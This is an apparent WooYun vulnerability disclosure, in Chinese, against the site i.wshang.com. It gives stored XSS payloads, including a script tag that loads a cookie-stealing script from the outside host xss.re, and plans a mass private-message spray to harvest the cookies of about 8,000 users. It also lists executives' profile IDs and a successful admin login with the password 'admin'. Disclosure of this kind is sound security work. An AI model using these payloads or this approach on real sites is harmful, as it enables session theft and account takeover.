WooYun.org

觉得很有必要先来科普天下网商，请看http://www.wshang.com/about/txws.html

这样说来，天下网商也是阿里巴巴旗下的吧。
这次的漏洞出在天下网商旗下的电商知识网站“i天下网商”。
1.存储型XSS
XSS漏洞的一个根源在于用户注册。http://i.wshang.com/Login/Default/Register.html
首先，用户名输入<script src=http://xss.re/4914></script>可以看到做了一些验证，用户名只让输入字母和数字。

那我们就先来个正常的用户名: aaaaaa。
拦截HTTP头，forward两下，然后将里面的user=aaaaaa改成user=<script src=http://xss.re/4914></script>再发出去。

成功绕过，注册成功。

因为<script src=http://xss.re/4914></script>这个是看不到XSS弹窗，但是能获取用户Cookie。为了能够更真实说明漏洞存在，我再注册了一个用户<script>alert(“XSS”)<script>。

查了一下源代码，发现触发XSS的地方并不是很明显的用户名那里，而是如下图所示。也就是说只有用户登录<script>alert(“XSS”)<script>这个帐号才能触发XSS。这是要自己打自己么？当然还有其他方法啦。

发现查看用户很简单啊，直接改http://i.wshang.com/UserCenter/Default/Index/uid/1 uid后面的数字就可以了。看看都有些谁注册过这个网站呢？直接告诉我，大人物的数字会比较靠前。uid/1开始往后慢慢瞧下。
不是吧，阿里巴巴副总裁品觉！那就列几个出来吧。
http://i.wshang.com/UserCenter/Default/Index/uid/10 品觉（阿里巴巴副总裁）
http://i.wshang.com/UserCenter/Default/Index/uid/4 黄刚（中国供应链联盟理事、汉森世纪供应链副总经理、数十家大型企业SCM战略顾问 擅长领域：仓储物流、供应链管理 ...）
http://i.wshang.com/UserCenter/Default/Index/uid/5 iwshang(我猜是管理员帐号)
http://i.wshang.com/UserCenter/Default/Index/uid/9 大熊（天品网CEO）
真的好多大人物……重点是下面，怎么利用XSS漏洞呢？有一个发送私信功能，我们来看下。

测试一下私信能否触发XSS。不单单测试用户名了，一起上吧。主题内容也一起填上<script>alert("XSS")</script>。换另一个号去看私信。

<span class="unread"></span>
    <span>
        From：
        <a href="http://i.wshang.com/UserCenter/Default/Index/Uid/8326.html">
            <script>
                alert("XSS")
            </script>
        </a>
    </span>
</dt>
<dd>
    <h3>
        <a class="showMRW checkread" call="mailWrap72" mid="72">
            <script>
                alert("XSS")
            </script>
        </a>
</h3>

查看源码发现，私信的From和Subject都存在XSS。也就是说，我们之前的通过特殊技巧注册的用户名是“大有用途”的。本来想给管理员测试下的，后来想想还是算了。自己抓下自己的Cookie。

2.私信设计缺陷，毫无限制痕迹
再对发送私信的功能测试了一下，抓取HTTP头，发现toUid后面所接的数字就是所有发送到对方用户的id。更要命的是网站对发送接受私信的间隔什么的完全没有限制，如果我把这个变量用一个从1到8000多的字典Intruder的话，看到这个私信的用户都会被获取Cookie。后果很严重。就算不能XSS，给一个用户不断发垃圾私信，也够烦的了……

3.管理员弱口令
上面我猜测到了帐号iwshang是管理员帐号，测试一下是否存在弱口令。用户名：iwshang，密码：admin。居然登上去了！
因为一直找不到后台，只能登录前台了……